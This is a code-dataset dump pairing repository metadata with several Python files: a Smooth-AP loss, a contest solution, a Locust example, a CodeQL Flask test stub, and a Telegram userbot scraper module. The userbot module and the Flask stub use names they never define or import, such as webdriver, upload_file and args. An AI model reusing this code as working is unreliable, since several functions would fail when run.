hexsha
stringlengths 40
40
| size
int64 3
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
972
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
972
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
972
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.03M
| avg_line_length
float64 1.13
941k
| max_line_length
int64 2
941k
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
629d20ca0042c3dac8bb53e45b950962e6649a0a
| 5,394
|
py
|
Python
|
src/pytorch_metric_learning/losses/smoothap.py
|
interestingzhuo/pytorch-metric-learning
|
8344974974a6946ddf65e3f4c12e1c72763f17a4
|
[
"MIT"
] | 188
|
2020-07-14T15:04:37.000Z
|
2022-03-18T11:58:59.000Z
|
src/Smooth_AP_loss.py
|
elias-ramzi/Smooth_AP
|
46b6cf0ddef2041345ec75f722673929d5ed5def
|
[
"MIT"
] | 24
|
2020-07-25T07:27:49.000Z
|
2021-08-10T11:34:58.000Z
|
src/Smooth_AP_loss.py
|
elias-ramzi/Smooth_AP
|
46b6cf0ddef2041345ec75f722673929d5ed5def
|
[
"MIT"
] | 32
|
2020-07-16T11:06:22.000Z
|
2022-03-12T18:19:56.000Z
|
# requirements:
# python 3.x
# torch = 1.1.0
import torch
def sigmoid(tensor, temp=1.0):
""" temperature controlled sigmoid
takes as input a torch tensor (tensor) and passes it through a sigmoid, controlled by temperature: temp
"""
exponent = -tensor / temp
# clamp the input tensor for stability
exponent = torch.clamp(exponent, min=-50, max=50)
y = 1.0 / (1.0 + torch.exp(exponent))
return y
def compute_aff(x):
"""computes the affinity matrix between an input vector and itself"""
return torch.mm(x, x.t())
class SmoothAP(torch.nn.Module):
"""PyTorch implementation of the Smooth-AP loss.
implementation of the Smooth-AP loss. Takes as input the mini-batch of CNN-produced feature embeddings and returns
the value of the Smooth-AP loss. The mini-batch must be formed of a defined number of classes. Each class must
have the same number of instances represented in the mini-batch and must be ordered sequentially by class.
e.g. the labels for a mini-batch with batch size 9, and 3 represented classes (A,B,C) must look like:
labels = ( A, A, A, B, B, B, C, C, C)
(the order of the classes however does not matter)
For each instance in the mini-batch, the loss computes the Smooth-AP when it is used as the query and the rest of the
mini-batch is used as the retrieval set. The positive set is formed of the other instances in the batch from the
same class. The loss returns the average Smooth-AP across all instances in the mini-batch.
Args:
anneal : float
the temperature of the sigmoid that is used to smooth the ranking function. A low value of the temperature
results in a steep sigmoid, that tightly approximates the heaviside step function in the ranking function.
batch_size : int
the batch size being used during training.
num_id : int
the number of different classes that are represented in the batch.
feat_dims : int
the dimension of the input feature embeddings
Shape:
- Input (preds): (batch_size, feat_dims) (must be a cuda torch float tensor)
- Output: scalar
Examples::
>>> loss = SmoothAP(0.01, 60, 6, 256)
>>> input = torch.randn(60, 256, requires_grad=True).cuda()
>>> output = loss(input)
>>> output.backward()
"""
def __init__(self, anneal, batch_size, num_id, feat_dims):
"""
Parameters
----------
anneal : float
the temperature of the sigmoid that is used to smooth the ranking function
batch_size : int
the batch size being used
num_id : int
the number of different classes that are represented in the batch
feat_dims : int
the dimension of the input feature embeddings
"""
super(SmoothAP, self).__init__()
assert(batch_size%num_id==0)
self.anneal = anneal
self.batch_size = batch_size
self.num_id = num_id
self.feat_dims = feat_dims
def forward(self, preds):
"""Forward pass for all input predictions: preds - (batch_size x feat_dims) """
# ------ differentiable ranking of all retrieval set ------
# compute the mask which ignores the relevance score of the query to itself
mask = 1.0 - torch.eye(self.batch_size)
mask = mask.unsqueeze(dim=0).repeat(self.batch_size, 1, 1)
# compute the relevance scores via cosine similarity of the CNN-produced embedding vectors
sim_all = compute_aff(preds)
sim_all_repeat = sim_all.unsqueeze(dim=1).repeat(1, self.batch_size, 1)
# compute the difference matrix
sim_diff = sim_all_repeat - sim_all_repeat.permute(0, 2, 1)
# pass through the sigmoid
sim_sg = sigmoid(sim_diff, temp=self.anneal) * mask.cuda()
# compute the rankings
sim_all_rk = torch.sum(sim_sg, dim=-1) + 1
# ------ differentiable ranking of only positive set in retrieval set ------
# compute the mask which only gives non-zero weights to the positive set
xs = preds.view(self.num_id, int(self.batch_size / self.num_id), self.feat_dims)
pos_mask = 1.0 - torch.eye(int(self.batch_size / self.num_id))
pos_mask = pos_mask.unsqueeze(dim=0).unsqueeze(dim=0).repeat(self.num_id, int(self.batch_size / self.num_id), 1, 1)
# compute the relevance scores
sim_pos = torch.bmm(xs, xs.permute(0, 2, 1))
sim_pos_repeat = sim_pos.unsqueeze(dim=2).repeat(1, 1, int(self.batch_size / self.num_id), 1)
# compute the difference matrix
sim_pos_diff = sim_pos_repeat - sim_pos_repeat.permute(0, 1, 3, 2)
# pass through the sigmoid
sim_pos_sg = sigmoid(sim_pos_diff, temp=self.anneal) * pos_mask.cuda()
# compute the rankings of the positive set
sim_pos_rk = torch.sum(sim_pos_sg, dim=-1) + 1
# sum the values of the Smooth-AP for all instances in the mini-batch
ap = torch.zeros(1).cuda()
group = int(self.batch_size / self.num_id)
for ind in range(self.num_id):
pos_divide = torch.sum(sim_pos_rk[ind] / (sim_all_rk[(ind * group):((ind + 1) * group), (ind * group):((ind + 1) * group)]))
ap = ap + ((pos_divide / group) / self.batch_size)
return (1-ap)
| 41.813953
| 136
| 0.647757
|
6bc413a1631fcec745dd8ae99bc6dcf08e416fe8
| 3,018
|
py
|
Python
|
sport/solutions/bj/10448.py
|
Epikem/dev-tips
|
ed5a258334dd18ef505f51e320f7a9f5ee535cf9
|
[
"MIT"
] | null | null | null |
sport/solutions/bj/10448.py
|
Epikem/dev-tips
|
ed5a258334dd18ef505f51e320f7a9f5ee535cf9
|
[
"MIT"
] | 8
|
2020-04-03T15:33:54.000Z
|
2022-03-02T10:24:22.000Z
|
sport/solutions/bj/10448.py
|
Epikem/dev-tips
|
ed5a258334dd18ef505f51e320f7a9f5ee535cf9
|
[
"MIT"
] | null | null | null |
false = False
true = True
null = None
TEST = false
try:
import sys
for arg in sys.argv:
if(arg == 'test'):
print('test mode')
TEST = True
pass
except:
pass
def AddImports(libraryNames):
for libname in libraryNames:
if (type(libname) == type(tuple())):
short = libname[1]
libname = libname[0]
else:
short = None
try:
lib = __import__(libname)
except ImportError:
pass
else:
if short:
globals()[short] = lib
else:
globals()[libname] = lib
return True
libnames = ['fileinput', 'codecs', 'operator', 'functools', 'math', 'io', 'platform', 'collections', 'mmap', 'logging', 'logging.handlers']
# libnames = ['math']
AddImports(libnames)
IntellisenseHint = False
if IntellisenseHint:
import fileinput
import codecs
import operator
import functools
import math
import io
import platform
import collections
import mmap
import logging
import logging.handlers
# import defs
class memoized(object, ):
"Decorator. Caches a function's return value each time it is called.\n\tIf called later with the same arguments, the cached value is returned\n\t(not reevaluated).\n\t"
def __init__(self, func):
self.func = func
self.cache = {}
def __call__(self, *args):
if (not isinstance(args, collections.Hashable)):
return self.func(*args)
if (args in self.cache):
return self.cache[args]
else:
value = self.func(*args)
self.cache[args] = value
return value
def __repr__(self):
"Return the function's docstring."
return self.func.__doc__
def __get__(self, obj, objtype):
'Support instance methods.'
return functools.partial(self.__call__, obj)
def it(args):
if(TEST): print(args)
# print(args, vargs)
def floatEqual(a,b):
diff = math.fabs(a-b)
if(diff < 1e-10): return True
else: return diff <= 1e-8 * max(math.fabs(a), math.fabs(b))
def ria():
return list(map(int,input().strip(' ').split(' ')))
def solve():
cache = {}
li = [False]* 1001
tris = [1]*1001
cands = [9999]*1001
dons = [9999]*1001
for i in range(1, 1001):
tris[i] = tris[i-1] + i+1
pass
it(tris)
for i in range(1000):
for j in range(1000):
[a,b] = [tris[i], tris[j]]
if(a+b<=1000):
cands[a+b] = a+b
for i in range(1000):
for j in range(1000):
[a,b] = [cands[i], tris[j]]
if(a+b <= 1000):
dons[a+b] = 1
it(dons)
T = ria()[0]
for _ in range(T):
n = ria()[0]
print(1 if dons[n]==1 else 0)
pass
solve()
| 24.942149
| 173
| 0.519218
|
f5418b6997ce1b81a0e5f944b2d87e9586638337
| 550
|
py
|
Python
|
GlobalHelper.py
|
825477418/XX
|
bf46e34749394002eec0fdc65e34c339ce022cab
|
[
"MIT"
] | null | null | null |
GlobalHelper.py
|
825477418/XX
|
bf46e34749394002eec0fdc65e34c339ce022cab
|
[
"MIT"
] | 1
|
2020-06-03T13:54:29.000Z
|
2020-06-03T13:54:29.000Z
|
GlobalHelper.py
|
825477418/XX
|
bf46e34749394002eec0fdc65e34c339ce022cab
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Time : 2018/7/7 2:01
# @Email : billsteve@126.com
# @File : GlobalHelper.py
# @Software : PyCharm
import time
import XX.DB.RedisHelper as credis
import XX.String.StringHelper as cstr
# 全局暂停功能
def global_sleep(ts=0, redis_conn=None, **kw):
if not redis_conn:
redis_conn = credis.RedisHelper.get_redis_connect(host=kw.get("redis_host", "localhost"))
if not ts:
ts = cstr.str2int(redis_conn.get("k_global_ts"))
ts = ts if ts else 0
time.sleep(ts)
| 27.5
| 97
| 0.645455
|
4bdceb212ed23928b06126eb6471a726df66a78c
| 765
|
py
|
Python
|
python/ql/test/query-tests/Security/lib/flask/__init__.py
|
robertbrignull/ql
|
2ecef33c9d2c9a66b5359b68437c3229fcf54964
|
[
"MIT"
] | 26
|
2020-06-30T03:07:19.000Z
|
2022-03-31T03:57:23.000Z
|
python/ql/test/query-tests/Security/lib/flask/__init__.py
|
mdisec/codeql
|
791f31fa6514c18fcfcba1d685bc2d6393b6f6f6
|
[
"MIT"
] | 2
|
2020-04-06T02:08:30.000Z
|
2020-04-06T02:08:31.000Z
|
python/ql/test/query-tests/Security/lib/flask/__init__.py
|
mdisec/codeql
|
791f31fa6514c18fcfcba1d685bc2d6393b6f6f6
|
[
"MIT"
] | 10
|
2021-03-24T13:09:08.000Z
|
2022-02-10T07:39:30.000Z
|
from .globals import request
from .globals import current_app
class Flask(object):
# Only some methods mocked, signature copied from
# https://flask.palletsprojects.com/en/1.1.x/api/#flask.Flask
def run(host=None, port=None, debug=None, load_dotenv=True, **options):
pass
def make_response(rv):
pass
def add_url_rule(rule, endpoint=None, view_func=None, provide_automatic_options=None, **options):
pass
class Response(object):
pass
def redirect(location, code=302, Response=None):
pass
def make_response(rv):
if not args:
return current_app.response_class()
if len(args) == 1:
args = args[0]
return current_app.make_response(args)
def escape(txt):
return Markup.escape(txt)
| 24.677419
| 101
| 0.687582
|
f4f82ad2f8f47d833850437c2267e9c8faab3813
| 67
|
py
|
Python
|
myUtil/myRedis/__init__.py
|
mengyingzhou/FlexHTTP
|
40a931fa910f3709b9ff79ad5e10ce8c01c1c246
|
[
"BSD-3-Clause"
] | 1
|
2022-03-16T17:19:10.000Z
|
2022-03-16T17:19:10.000Z
|
myUtil/myRedis/__init__.py
|
mengyingzhou/FlexHTTP
|
40a931fa910f3709b9ff79ad5e10ce8c01c1c246
|
[
"BSD-3-Clause"
] | null | null | null |
myUtil/myRedis/__init__.py
|
mengyingzhou/FlexHTTP
|
40a931fa910f3709b9ff79ad5e10ce8c01c1c246
|
[
"BSD-3-Clause"
] | null | null | null |
from .redis_row import RedisRow
from .redis_table import RedisTable
| 33.5
| 35
| 0.865672
|
bd2d07e152d75d132183efda952b532e63221d8e
| 410
|
py
|
Python
|
example/simple.py
|
girishc13/docker-locust
|
b7b71d737e5f7c383f2fdef2fa2e9c3c8065c2da
|
[
"Apache-2.0"
] | 194
|
2017-01-16T16:32:16.000Z
|
2022-03-29T04:25:39.000Z
|
example/simple.py
|
girishc13/docker-locust
|
b7b71d737e5f7c383f2fdef2fa2e9c3c8065c2da
|
[
"Apache-2.0"
] | 109
|
2017-01-23T10:31:44.000Z
|
2021-06-01T10:41:58.000Z
|
example/simple.py
|
girishc13/docker-locust
|
b7b71d737e5f7c383f2fdef2fa2e9c3c8065c2da
|
[
"Apache-2.0"
] | 68
|
2017-02-16T19:05:33.000Z
|
2021-09-18T16:01:18.000Z
|
from locust import HttpLocust
from locust import TaskSet
from locust import task
# For HTML reporting
from locust.web import app
from src import report
app.add_url_rule('/htmlreport', 'htmlreport', report.download_report)
class SimpleBehavior(TaskSet):
@task
def index(self):
self.client.get('/')
class MyLocust(HttpLocust):
task_set = SimpleBehavior
min_wait = 0
max_wait = 0
| 19.52381
| 69
| 0.731707
|
0ea2742bb4374cb98406a9094825226fce5dfd96
| 35,431
|
py
|
Python
|
userbot/modules/scrapers.py
|
dedeeinheree/Man-Userbot
|
3f84ec55defc9c822513be34f42556ee70069a30
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/scrapers.py
|
dedeeinheree/Man-Userbot
|
3f84ec55defc9c822513be34f42556ee70069a30
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/scrapers.py
|
dedeeinheree/Man-Userbot
|
3f84ec55defc9c822513be34f42556ee70069a30
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | 1
|
2021-11-18T07:01:02.000Z
|
2021-11-18T07:01:02.000Z
|
# Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
#
# thanks to the owner of X-tra-Telegram for tts fix
#
# Recode by @mrismanaziz
# FROM Man-Userbot
# t.me/SharingUserbot
#
""" Userbot module containing various scrapers. """
import asyncio
import io
import json
import os
import re
import shutil
import time
from asyncio import sleep
from re import findall, match
from time import sleep
from urllib.parse import quote_plus
import asyncurban
import barcode
import emoji
import qrcode
import requests
from barcode.writer import ImageWriter
from bs4 import BeautifulSoup
from emoji import get_emoji_regexp
from googletrans import LANGUAGES, Translator
from gtts import gTTS
from gtts.lang import tts_langs
from requests import get
from search_engine_parser import BingSearch, GoogleSearch, YahooSearch
from search_engine_parser.core.exceptions import NoResultsOrTrafficError
from telethon.tl.types import DocumentAttributeAudio, MessageMediaPhoto
from wikipedia import summary
from wikipedia.exceptions import DisambiguationError, PageError
from youtube_dl import YoutubeDL
from youtube_dl.utils import (
ContentTooShortError,
DownloadError,
ExtractorError,
GeoRestrictedError,
MaxDownloadsReached,
PostProcessingError,
UnavailableVideoError,
XAttrMetadataError,
)
from youtube_search import YoutubeSearch
from userbot import (
BOTLOG,
BOTLOG_CHATID,
CMD_HELP,
LOGS,
OCR_SPACE_API_KEY,
REM_BG_API_KEY,
TEMP_DOWNLOAD_DIRECTORY,
bot,
)
from userbot.events import register
from userbot.utils import (
chrome,
edit_delete,
edit_or_reply,
googleimagesdownload,
options,
progress,
)
CARBONLANG = "auto"
TTS_LANG = "id"
TRT_LANG = "id"
TEMP_DOWNLOAD_DIRECTORY = "/root/userbot/.bin"
async def ocr_space_file(
filename, overlay=False, api_key=OCR_SPACE_API_KEY, language="eng"
):
payload = {
"isOverlayRequired": overlay,
"apikey": api_key,
"language": language,
}
with open(filename, "rb") as f:
r = requests.post(
"https://api.ocr.space/parse/image",
files={filename: f},
data=payload,
)
return r.json()
@register(outgoing=True, pattern=r"^\.crblang (.*)")
async def setlang(prog):
global CARBONLANG
CARBONLANG = prog.pattern_match.group(1)
await prog.edit(f"Bahasa untuk carbon.now.sh mulai {CARBONLANG}")
@register(outgoing=True, pattern="^.carbon")
async def carbon_api(e):
"""A Wrapper for carbon.now.sh"""
await e.edit("`Processing..`")
CARBON = "https://carbon.now.sh/?l={lang}&code={code}"
global CARBONLANG
textx = await e.get_reply_message()
pcode = e.text
if pcode[8:]:
pcode = str(pcode[8:])
elif textx:
pcode = str(textx.message) # Importing message to module
code = quote_plus(pcode) # Converting to urlencoded
await e.edit("`Processing..\n25%`")
if os.path.isfile("/root/userbot/.bin/carbon.png"):
os.remove("/root/userbot/.bin/carbon.png")
url = CARBON.format(code=code, lang=CARBONLANG)
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.binary_location = GOOGLE_CHROME_BIN
chrome_options.add_argument("--window-size=1920x1080")
chrome_options.add_argument("--disable-dev-shm-usage")
chrome_options.add_argument("--no-sandbox")
chrome_options.add_argument("--disable-gpu")
prefs = {"download.default_directory": "/root/userbot/.bin"}
chrome_options.add_experimental_option("prefs", prefs)
driver = webdriver.Chrome(executable_path=CHROME_DRIVER, options=chrome_options)
driver.get(url)
await e.edit("`Processing..\n50%`")
download_path = "/root/userbot/.bin"
driver.command_executor._commands["send_command"] = (
"POST",
"/session/$sessionId/chromium/send_command",
)
params = {
"cmd": "Page.setDownloadBehavior",
"params": {"behavior": "allow", "downloadPath": download_path},
}
driver.execute("send_command", params)
driver.find_element_by_xpath("//button[contains(text(),'Export')]").click()
# driver.find_element_by_xpath("//button[contains(text(),'4x')]").click()
# driver.find_element_by_xpath("//button[contains(text(),'PNG')]").click()
await e.edit("`Processing..\n75%`")
# Waiting for downloading
while not os.path.isfile("/root/userbot/.bin/carbon.png"):
await sleep(0.5)
await e.edit("`Processing..\n100%`")
file = "/root/userbot/.bin/carbon.png"
await e.edit("`Uploading..`")
await e.client.send_file(
e.chat_id,
file,
caption="Made using [Carbon](https://carbon.now.sh/about/),\
\na project by [Dawn Labs](https://dawnlabs.io/)",
force_document=True,
reply_to=e.message.reply_to_msg_id,
)
os.remove("/root/userbot/.bin/carbon.png")
driver.quit()
# Removing carbon.png after uploading
await e.delete() # Deleting msg
@register(outgoing=True, pattern=r"^\.img (.*)")
async def img_sampler(event):
"""For .img command, search and return images matching the query."""
await event.edit("`Sedang Mencari Gambar Yang Anda Cari...`")
query = event.pattern_match.group(1)
lim = findall(r"lim=\d+", query)
try:
lim = lim[0]
lim = lim.replace("lim=", "")
query = query.replace("lim=" + lim[0], "")
except IndexError:
lim = 15
response = googleimagesdownload()
# creating list of arguments
arguments = {
"keywords": query,
"limit": lim,
"format": "jpg",
"no_directory": "no_directory",
}
# passing the arguments to the function
paths = response.download(arguments)
lst = paths[0][query]
await event.client.send_file(
await event.client.get_input_entity(event.chat_id), lst
)
shutil.rmtree(os.path.dirname(os.path.abspath(lst[0])))
await event.delete()
@register(outgoing=True, pattern=r"^\.currency ([\d\.]+) ([a-zA-Z]+) ([a-zA-Z]+)")
async def moni(event):
c_from_val = float(event.pattern_match.group(1))
c_from = (event.pattern_match.group(2)).upper()
c_to = (event.pattern_match.group(3)).upper()
try:
response = get(
"https://api.frankfurter.app/latest",
params={"from": c_from, "to": c_to},
).json()
except Exception:
await event.edit("**Error: API is down.**")
return
if "error" in response:
await event.edit(
"**sepertinya ini mata uang asing, yang tidak dapat saya konversi sekarang.**"
)
return
c_to_val = round(c_from_val * response["rates"][c_to], 2)
await event.edit(f"**{c_from_val} {c_from} = {c_to_val} {c_to}**")
@register(outgoing=True, pattern=r"^\.google ([\s\S]*)")
async def gsearch(q_event):
man = await edit_or_reply(q_event, "`Processing...`")
match = q_event.pattern_match.group(1)
page = re.findall(r"-p\d+", match)
lim = re.findall(r"-l\d+", match)
try:
page = page[0]
page = page.replace("-p", "")
match = match.replace("-p" + page, "")
except IndexError:
page = 1
try:
lim = lim[0]
lim = lim.replace("-l", "")
match = match.replace("-l" + lim, "")
lim = int(lim)
if lim <= 0:
lim = int(5)
except IndexError:
lim = 5
smatch = match.replace(" ", "+")
search_args = (str(smatch), int(page))
gsearch = GoogleSearch()
bsearch = BingSearch()
ysearch = YahooSearch()
try:
gresults = await gsearch.async_search(*search_args)
except NoResultsOrTrafficError:
try:
gresults = await bsearch.async_search(*search_args)
except NoResultsOrTrafficError:
try:
gresults = await ysearch.async_search(*search_args)
except Exception as e:
return await edit_delete(man, f"**ERROR:**\n`{e}`", time=10)
msg = ""
for i in range(lim):
if i > len(gresults["links"]):
break
try:
title = gresults["titles"][i]
link = gresults["links"][i]
desc = gresults["descriptions"][i]
msg += f"👉 [{title}]({link})\n`{desc}`\n\n"
except IndexError:
break
await edit_or_reply(
man,
"**Keyword Google Search:**\n`" + match + "`\n\n**Results:**\n" + msg,
link_preview=False,
aslink=True,
linktext=f"**Hasil Pencarian untuk Keyword** `{match}` **adalah** :",
)
@register(outgoing=True, pattern=r"^\.wiki (.*)")
async def wiki(wiki_q):
"""For .wiki command, fetch content from Wikipedia."""
match = wiki_q.pattern_match.group(1)
try:
summary(match)
except DisambiguationError as error:
await wiki_q.edit(f"Ditemukan halaman yang tidak ambigu.\n\n{error}")
return
except PageError as pageerror:
await wiki_q.edit(f"Halaman tidak ditemukan.\n\n{pageerror}")
return
result = summary(match)
if len(result) >= 4096:
with open("output.txt", "w+") as file:
file.write(result)
await wiki_q.client.send_file(
wiki_q.chat_id,
"output.txt",
reply_to=wiki_q.id,
caption="`Output terlalu besar, dikirim sebagai file`",
)
if os.path.exists("output.txt"):
os.remove("output.txt")
return
await wiki_q.edit("**Search:**\n`" + match + "`\n\n**Result:**\n" + result)
@register(outgoing=True, pattern=r"^\.ud (.*)")
async def _(event):
if event.fwd_from:
return
await event.edit("processing...")
word = event.pattern_match.group(1)
urban = asyncurban.UrbanDictionary()
try:
mean = await urban.get_word(word)
await event.edit(
"Text: **{}**\n\nBerarti: **{}**\n\nContoh: __{}__".format(
mean.word, mean.definition, mean.example
)
)
except asyncurban.WordNotFoundError:
await event.edit("Tidak ada hasil untuk **" + word + "**")
@register(outgoing=True, pattern=r"^\.tts(?: |$)([\s\S]*)")
async def text_to_speech(query):
"""For .tts command, a wrapper for Google Text-to-Speech."""
textx = await query.get_reply_message()
message = query.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
return await query.edit(
"**Berikan teks atau balas pesan untuk Text-to-Speech!**"
)
try:
gTTS(message, lang=TTS_LANG)
except AssertionError:
return await query.edit(
"**Teksnya kosong.**\n"
"Tidak ada yang tersisa untuk dibicarakan setelah pra-pemrosesan, pembuatan token, dan pembersihan."
)
except ValueError:
return await query.edit("**Bahasa tidak didukung.**")
except RuntimeError:
return await query.edit("**Error saat memuat kamus bahasa.**")
tts = gTTS(message, lang=TTS_LANG)
tts.save("k.mp3")
with open("k.mp3", "rb") as audio:
linelist = list(audio)
linecount = len(linelist)
if linecount == 1:
tts = gTTS(message, lang=TTS_LANG)
tts.save("k.mp3")
with open("k.mp3", "r"):
await query.client.send_file(query.chat_id, "k.mp3", voice_note=True)
os.remove("k.mp3")
await query.delete()
@register(outgoing=True, pattern=r"^\.tr(?: |$)(.*)")
async def _(event):
if event.fwd_from:
return
if "trim" in event.raw_text:
return
input_str = event.pattern_match.group(1)
if event.reply_to_msg_id:
previous_message = await event.get_reply_message()
text = previous_message.message
lan = input_str or "id"
elif "|" in input_str:
lan, text = input_str.split("|")
else:
await event.edit("**.tr <kode bahasa>** sambil reply ke pesan")
return
text = emoji.demojize(text.strip())
lan = lan.strip()
translator = Translator()
try:
translated = translator.translate(text, dest=lan)
after_tr_text = translated.text
output_str = """**DITERJEMAHKAN** dari `{}` ke `{}`
{}""".format(
translated.src, lan, after_tr_text
)
await event.edit(output_str)
except Exception as exc:
await event.edit(str(exc))
@register(pattern=r"\.lang (tr|tts) (.*)", outgoing=True)
async def lang(value):
"""For .lang command, change the default langauge of userbot scrapers."""
util = value.pattern_match.group(1).lower()
if util == "tr":
scraper = "Translator"
global TRT_LANG
arg = value.pattern_match.group(2).lower()
if arg in LANGUAGES:
TRT_LANG = arg
LANG = LANGUAGES[arg]
else:
await value.edit(
f"**Kode Bahasa tidak valid !!**\n**Kode bahasa yang tersedia**:\n\n`{LANGUAGES}`"
)
return
elif util == "tts":
scraper = "Text to Speech"
global TTS_LANG
arg = value.pattern_match.group(2).lower()
if arg in tts_langs():
TTS_LANG = arg
LANG = tts_langs()[arg]
else:
await value.edit(
f"**Kode Bahasa tidak valid!!**\n**Kode bahasa yang tersedia**:\n\n`{tts_langs()}`"
)
return
await value.edit(
f"**Bahasa untuk** `{scraper}` **diganti menjadi** `{LANG.title()}`"
)
if BOTLOG:
await value.client.send_message(
BOTLOG_CHATID,
f"**Bahasa untuk** `{scraper}` **diganti menjadi** `{LANG.title()}`",
)
@register(outgoing=True, pattern=r"^\.yt (\d*) *(.*)")
async def yt_search(video_q):
"""For .yt command, do a YouTube search from Telegram."""
if video_q.pattern_match.group(1) != "":
counter = int(video_q.pattern_match.group(1))
if counter > 10:
counter = int(10)
if counter <= 0:
counter = int(1)
else:
counter = int(5)
query = video_q.pattern_match.group(2)
if not query:
await video_q.edit("`Masukkan keyword untuk dicari`")
await video_q.edit("`Processing...`")
try:
results = json.loads(YoutubeSearch(query, max_results=counter).to_json())
except KeyError:
return await video_q.edit(
"`Pencarian Youtube menjadi lambat.\nTidak dapat mencari keyword ini!`"
)
output = f"**Pencarian Keyword:**\n`{query}`\n\n**Hasil:**\n\n"
for i in results["videos"]:
try:
title = i["title"]
link = "https://youtube.com" + i["url_suffix"]
channel = i["channel"]
duration = i["duration"]
views = i["views"]
output += f"[{title}]({link})\nChannel: `{channel}`\nDuration: {duration} | {views}\n\n"
except IndexError:
break
await video_q.edit(output, link_preview=False)
@register(outgoing=True, pattern=r".yt(audio|video) (.*)")
async def download_video(v_url):
"""For .yt command, download media from YouTube and many other sites."""
dl_type = v_url.pattern_match.group(1).lower()
url = v_url.pattern_match.group(2)
await v_url.edit("`Preparing to download...`")
video = False
audio = False
if dl_type == "audio":
opts = {
"format": "bestaudio",
"addmetadata": True,
"key": "FFmpegMetadata",
"writethumbnail": True,
"prefer_ffmpeg": True,
"geo_bypass": True,
"nocheckcertificate": True,
"postprocessors": [
{
"key": "FFmpegExtractAudio",
"preferredcodec": "mp3",
"preferredquality": "320",
}
],
"outtmpl": "%(id)s.%(ext)s",
"quiet": True,
"logtostderr": False,
}
audio = True
elif dl_type == "video":
opts = {
"format": "best",
"addmetadata": True,
"key": "FFmpegMetadata",
"prefer_ffmpeg": True,
"geo_bypass": True,
"nocheckcertificate": True,
"postprocessors": [
{"key": "FFmpegVideoConvertor", "preferedformat": "mp4"}
],
"outtmpl": "%(id)s.%(ext)s",
"logtostderr": False,
"quiet": True,
}
video = True
try:
await v_url.edit("`Fetching data, please wait..`")
with YoutubeDL(opts) as rip:
rip_data = rip.extract_info(url)
except DownloadError as DE:
return await v_url.edit(f"`{str(DE)}`")
except ContentTooShortError:
return await v_url.edit("`The download content was too short.`")
except GeoRestrictedError:
return await v_url.edit(
"`Video is not available from your geographic location "
"due to geographic restrictions imposed by a website.`"
)
except MaxDownloadsReached:
return await v_url.edit("`Max-downloads limit has been reached.`")
except PostProcessingError:
return await v_url.edit("`There was an error during post processing.`")
except UnavailableVideoError:
return await v_url.edit("`Media is not available in the requested format.`")
except XAttrMetadataError as XAME:
return await v_url.edit(f"`{XAME.code}: {XAME.msg}\n{XAME.reason}`")
except ExtractorError:
return await v_url.edit("`There was an error during info extraction.`")
except Exception as e:
return await v_url.edit(f"{str(type(e)): {str(e)}}")
c_time = time.time()
if audio:
await v_url.edit(
f"**Sedang Mengupload Lagu:**\n`{rip_data.get('title')}`"
f"\nby **{rip_data.get('uploader')}**"
)
f_name = rip_data.get("id") + ".mp3"
with open(f_name, "rb") as f:
result = await upload_file(
client=v_url.client,
file=f,
name=f_name,
progress_callback=lambda d, t: asyncio.get_event_loop().create_task(
progress(
d, t, v_url, c_time, "Uploading..", f"{rip_data['title']}.mp3"
)
),
)
img_extensions = ["jpg", "jpeg", "webp"]
img_filenames = [
fn_img
for fn_img in os.listdir()
if any(fn_img.endswith(ext_img) for ext_img in img_extensions)
]
thumb_image = img_filenames[0]
metadata = extractMetadata(createParser(f_name))
duration = 0
if metadata.has("duration"):
duration = metadata.get("duration").seconds
await v_url.client.send_file(
v_url.chat_id,
result,
supports_streaming=True,
attributes=[
DocumentAttributeAudio(
duration=duration,
title=rip_data.get("title"),
performer=rip_data.get("uploader"),
)
],
thumb=thumb_image,
)
os.remove(thumb_image)
os.remove(f_name)
await v_url.delete()
elif video:
await v_url.edit(
f"**Sedang Mengupload Video:**\n`{rip_data.get('title')}`"
f"\nby **{rip_data.get('uploader')}**"
)
f_name = rip_data.get("id") + ".mp4"
with open(f_name, "rb") as f:
result = await upload_file(
client=v_url.client,
file=f,
name=f_name,
progress_callback=lambda d, t: asyncio.get_event_loop().create_task(
progress(
d, t, v_url, c_time, "Uploading..", f"{rip_data['title']}.mp4"
)
),
)
thumb_image = await get_video_thumb(f_name, "thumb.png")
metadata = extractMetadata(createParser(f_name))
duration = 0
width = 0
height = 0
if metadata.has("duration"):
duration = metadata.get("duration").seconds
if metadata.has("width"):
width = metadata.get("width")
if metadata.has("height"):
height = metadata.get("height")
await v_url.client.send_file(
v_url.chat_id,
result,
thumb=thumb_image,
attributes=[
DocumentAttributeVideo(
duration=duration,
w=width,
h=height,
supports_streaming=True,
)
],
caption=rip_data["title"],
)
os.remove(f_name)
os.remove(thumb_image)
await v_url.delete()
def deEmojify(inputString):
"""Remove emojis and other non-safe characters from string"""
return get_emoji_regexp().sub("", inputString)
